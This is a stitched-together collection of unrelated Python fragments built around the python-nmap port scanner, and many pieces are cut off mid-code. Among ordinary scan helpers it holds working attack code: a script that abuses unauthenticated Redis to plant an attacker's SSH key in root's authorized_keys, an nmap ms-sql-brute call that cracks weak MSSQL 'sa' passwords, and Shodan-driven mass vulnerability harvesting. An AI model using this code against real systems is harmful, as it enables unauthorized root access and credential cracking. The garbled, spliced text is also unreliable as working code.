print(" [+] " + "\033[34m" + "Region: " + jso["regionName"] + "\033[0m") print(" [+] " + "\033[34m" + "Country: " + jso["country"] + "\033[0m") print(" [+] " + "\033[34m" + "City: " + jso["city"] + "\033[0m") print(" [+] " + "\033[34m" + "ISP: " + jso["isp"] + "\033[0m") print(" [+] " + "\033[34m" + "Lat & Lon: " + str(jso['lat']) + " & " + str(jso['lon']) + "\033[0m") print(" [+] " + "\033[34m" + "Zipcode: " + jso["zip"] + "\033[0m") print(" [+] " + "\033[34m" + "TimeZone: " + jso["timezone"] + "\033[0m") print(" [+] " + "\033[34m" + "AS: " + jso["as"] + "\033[0m" + "\n") except URLError: print( "\033[1;31m[-] Please provide a valid IP address!\033[1;m") elif choice == ("10"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() os.system("reset") print("\033[34mSearching for: Traceroute: \033[0m".format( target) + target) print("This will take a moment... Get some coffee :)\n") time.sleep(5) command = ("mtr " + "-4 -rwc 1 " + target) proces = os.popen(command) results = str(proces.read()) print("\033[1;34m" + results + command + "\033[1;m") except Exception: pass elif choice == ("11"): try: target = input("\033[1;91mEnter email: \033[0m") os.system("reset") print("\033[34mScanning....Have I been pwned: \033[0m\n" + target) time.sleep(1.5) url = ("https://haveibeenpwned.com/api/v2/breachedaccount/%s" % target) response = requests.get(url) if response.status_code == 200: response = response.json() le = len(response) for item in range(le): clas = str(response[item]["DataClasses"]) clas = re.sub("\[(?:[^\]|]*\|)?([^\]|]*)\]", r"\1", clas) clas = clas.replace("'", "") print("\n") print("Name: " + "\033[34m" + str(response[item]["Title"]) + "\033[0m") print("Domain: " + "\033[34m" + str(response[item]["Domain"]) + "\033[0m") print("Breached: " + "\033[34m" + str(response[item]["BreachDate"]) + "\033[0m") print("Details: " + "\033[34m" + str(clas) + "\033[0m") print("Verified: " + "\033[34m" + str(response[item]["IsVerified"]) + "\033[0m") else: print(" Email NOT Found in Database") except Exception: print(" \033[1;91mUnable to reach HaveIBeenPwned\033[0m") elif choice == ("12"): time.sleep(1) print( "\n\t\033[34mBlue Eye\033[0m DONE... Exiting... \033[34mLike to See Ya Hacking Anywhere ..!\033[0m\n" ) else: print("\033[1;31m[-] Invalid option!\033[1;m")
def getHostsOnTheSameNetwork(): portScanner = nmap.PortScanner() portScanner.scan('192.168.1.0/24', arguments='-p 22 --open') return portScanner.all_hosts()
def do_nmap(host_list): nm = nmap.PortScanner() nm.scan(hosts=host_list, arguments='-Pn -sC -p 1433 -max-hostgroup 3 -open -script ms-sql-brute.nse -v') for host in nm.all_hosts(): print(Vcolors.RED+str(host)+'\t mssql sa弱口令爆破~'+Vcolors.ENDC)
def nmap_scan(tgt_host, tgt_ports): nm_scan = nmap.PortScanner() for port in tgt_ports: nm_scan.scan(tgt_host, port) state = nm_scan[tgt_host]['tcp'][int(port)]['state'] print(f'[*] {tgt_host} tcp/{port} {state}')
def nmapScan(tgtHost,tgtPort): nmScan = nmap.PortScanner() scanResponse = nmScan.scan(tgtHost,tgtPort) state = getPortStatus(scanResponse, tgtHost, int(tgtPort)) print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def new_scan(queries, destination, confidence, shodan_key, vuln_scan): """ Start new scan with shodan and nmap port scanner :param queries: dictionary with shodan queries (dict) :param destination: destination write directory (str) :param confidence: confidence level (str) :param shodan_key: key from shodan API (str) :param vuln_scan: enable vulnerabilities scan (bool) :return result: list with shodan and nmap results (list) :return countries: list with countries (list) :return all_vulners: list with CVE vulnerabilities (list) :return vendor_vulners: dictionary with cve grouped by vend (dict) """ api = shodan.Shodan(shodan_key) nm = nmap.PortScanner() result_csv = [] result = [] countries = [] all_vulners = [] vendor_vulners = {} prev_vuln_counter = 0 for query in queries: # Confidence levels: # certain > firm > tentative # certain = certain # firm = certain + firm # tentative = certain + firm + tentative (all) confidence = confidence.lower() if confidence == 'certain': if query["confidence"] != confidence: print( "{color}[-] {product} ignored: confidence level is not equal ({confidence_query} / {confidence_req}){reset}" .format(color=PASS_VENDOR_BY_CONFIDENCE_COLOR, product=query["product"], confidence_query=query["confidence"], confidence_req=confidence, reset=RESET_COLOR)) continue elif confidence == 'firm': if query["confidence"] not in ['certain', 'firm']: print( "{color}[-] {product} ignored: confidence level is not equal ({confidence_query} / {confidence_req}){reset}" .format(color=PASS_VENDOR_BY_CONFIDENCE_COLOR, product=query["product"], confidence_query=query["confidence"], confidence_req=confidence, reset=RESET_COLOR)) continue try: print("{color}{product} found: {res_count}{reset}".format( color=PRODUCT_FOUND_COLOR, product=query["product"], res_count=api.count(query["query"]).get("total"), reset=RESET_COLOR)) current_result = api.search_cursor(query["query"]) # Save quantity of vulnerabilities before new query to count it if vuln_scan: prev_vuln_counter = len(all_vulners) # Parse every field from current scanned host for result_field in current_result: # Check for latitude and longitude location = result_field["location"] if None in (location["latitude"], location["longitude"]): continue # Collect countries for country-chart if location["country_name"]: countries.append(location["country_name"]) # Collect additional host info info = str( get_info(nm, query["script"], query["vendor"], result_field)) parsed_additional_info = delete_build(info) # Collect CVEs if vulnerabilities scan is on host_vulners = None if vuln_scan: host_vulners = host_vulners_scan( api, result_field.get("ip_str")) if host_vulners: add_hostvuln_to_allvuln(host_vulners, all_vulners) if host_vulners and vendor_exist(vuln_scan, query["vendor"]): print( '{color}[+] found {count} vulnerabilities for {name} from: {address}{reset}' .format(color=ADD_VULNERABILITIES_COLOR, count=len(host_vulners), name=query["vendor"], address=result_field.get("ip_str"), reset=RESET_COLOR)) vendor_vulners_scan(query["vendor"], vendor_vulners, host_vulners) # Create result array add_to_array( result, result_csv, { "product": query["product"], "vendor": query["vendor"], "port": result_field.get("port"), "proto": result_field["_shodan"]["module"], "ip": result_field.get("ip_str"), "lat": result_field["location"]["latitude"], "lng": result_field["location"]["longitude"], "country": location["country_name"], "vulnerabilities": host_vulners, "additional_info": parsed_additional_info }) # Calculate vulnerabilities quantity after new query if vuln_scan: print( "{color}[!] vulnerabilities found: {count}{reset}".format( color=ADD_VULNERABILITIES_COLOR, count=(len(all_vulners) - prev_vuln_counter), reset=RESET_COLOR)) except shodan.exception.APIError as rate_limit_err: print("{color}Request limit error: {error_info}{reset}".format( color=ERROR_COLOR, error_info=rate_limit_err, reset=RESET_COLOR)) # Default timer = 30 sec. time.sleep(REQUEST_LIMIT_SLEEP_TIME) except Exception as unknown_error: print("{color}Error: {error_info}{reset}".format( color=ERROR_COLOR, error_info=unknown_error, reset=RESET_COLOR)) if not result: break print("{color}Final result (unique hosts): {result_count}{reset}".format( color=ADD_VULNERABILITIES_COLOR, result_count=len(result), reset=RESET_COLOR)) print( "{color}Final result (unique pairs host and port): {unique_count}{reset}" .format(color=ADD_VULNERABILITIES_COLOR, unique_count=len(result_csv), reset=RESET_COLOR)) write_result_to_file_json(result, destination, RESULT_JSON_FILE) write_result_to_file_csv(result_csv, destination) return result, countries, all_vulners, vendor_vulners
def __init__(self): self.nm = nmap.PortScanner()
#!/usr/bin/env python # -*- coding: utf-8 -*- # luoye callyer # 输入单ip或者ip段,ip段输入:192.168.1.1-254 (符合nmap的方式) import re import nmap import redis nm = nmap.PortScanner(nmap_search_path=('nmap', r'D:\Nmap\nmap.exe')) #调用 redis模块通过config写入公钥 def crack_redis(ipaddress): try: target_redis = redis.Redis(host=ipaddress, port=6379) target_redis.config_set("dir", "/root/.ssh") target_redis.config_set("dbfilename", "authorized_keys") target_redis.set( "poc", "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCaZljNkr2tNCzl6c5bnS6W8ayiFvujmnTumllvIMMvjPxgc777JJUEArFaRjebW6xzbXM+p55huAmzBMiAooj5e2ROLotF4R3pW+6ETVSXaLYtMiSPxN0gKICu+bgAACa8ZZN9jyQ7k6//34Vci1w4Gbolcxmtt8K8mGp7Gk+fRAkawbrXrX6BZATph5yJOmv91ruHs1V5Y0hZ87+ZyYTrsPOpTYWbcnoxna1wMV1AXOLDA4Svdgq8598lwekgBcEvmVnmYwRwAmvYgtRg6rQUsHlnxYqqqWPvma1N8tnDmU16I63oo+KZAJs7NcJTr4ilRGWmuSQzmj7vOG4Va53FzTci3o1O35KFPoHuS1AESHiCCv/lGCb8J36ZrGDakWGrt5acTSqJYLjr15JaqhlOTJkQKfNkOIKFF13u5oGUd9causyyNTdPm4is0a/c+uNme7YiCbJfJrB3RM0xasfEnOBGS2Hk4k8xPOhZuvgUibar86wCmSNmO+GYrpKHwKs= root@kalinnn" ) target_redis.save() print("%s 测试完成,你现在可以免密登录" % ipaddress) except: print("%s 6379 port is open,but Permission denied" % ipaddress) # 调用nmap返回结果 def scan_check(address): check_result = nm.scan(address, '6379', '-sV') scan_result = [] for ip in check_result["scan"]:
def nmapScan(tgtHost, tgtPort): nm = nmap.PortScanner(nmap_search_path=('nmap', '/usr/bin/nmap', '/usr/local/bin/nmap', '/sw/bin/nmap', '/opt/local/bin/nmap', '/home/vliq/anaconda3/lib/python3.6/site-packages/nmap')) nmScan=scan(tgtHost, tgtPort) state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] print('[*] {} tcp/ {} {}'.format(tgtHost, tgtPort, state))
def nmapScan(tgtHost,tgtPort): nmScan = nmap.PortScanner() nmScan.scan(tgtHost,tgtPort) state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] print(' [*] ' + tgtHost + 'tcp/' + tgtPort + ' ' + state )
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os import nmap # import nmap.py module try: nm = nmap.PortScanner() # instantiate nmap.PortScanner object except nmap.PortScannerError: print('Nmap not found', sys.exc_info()[0]) sys.exit(1) except: print("Unexpected error:", sys.exc_info()[0]) sys.exit(1) nm.scan('127.0.0.1', '22-443') # scan host 127.0.0.1, ports from 22 to 443 nm.command_line( ) # get command line used for the scan : nmap -oX - -p 22-443 127.0.0.1 nm.scaninfo( ) # get nmap scan informations {'tcp': {'services': '22-443', 'method': 'connect'}} nm.all_hosts() # get all hosts that were scanned nm['127.0.0.1'].hostname() # get hostname for host 127.0.0.1 nm['127.0.0.1'].state(
def nmapScan(tgtHost, tgtPort): nmScan = nmap.PortScanner() nmScan.scan(tgtHost, tgtPort) state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] print(" [*] " + tgtHost + " tcp/" + tgtPort + " " + state)
# Execute: # python nmap_Test.py import nmap nmap1 = nmap.PortScanner() a = nmap1.nmap_version() print(a)
#!/usr/bin/env python3 from main import Main import nmap if __name__ == "__main__": hammer = Main() nmScan = nmap.PortScanner() nmScan.scan(hammer.args.ip, str(hammer.args.port)) #print(nmScan[str(hammer.args.ip)]['tcp'][hammer.args.port]['state']) #print(nmScan['192.168.1.110']['tcp'][445]['state']) if nmScan[str(hammer.args.ip)]['tcp'][hammer.args.port]['state'] == 'open': print(f'The port {hammer.args.port} is open') hammer.run(hammer.args.brute) #print(hammer.args.ip, hammer.args.port, hammer.args.user, hammer.args.passwd_file)
def nmap_scan(tgt_host, tgt_port): nmscan = nmap.PortScanner() nmscan.scan(tgt_host, tgt_port) state = nmscan[tgt_host]['tcp'][int(tgt_port)]['state'] print("[+] " + tgt_host + " tcp/" + tgt_port + " " + state)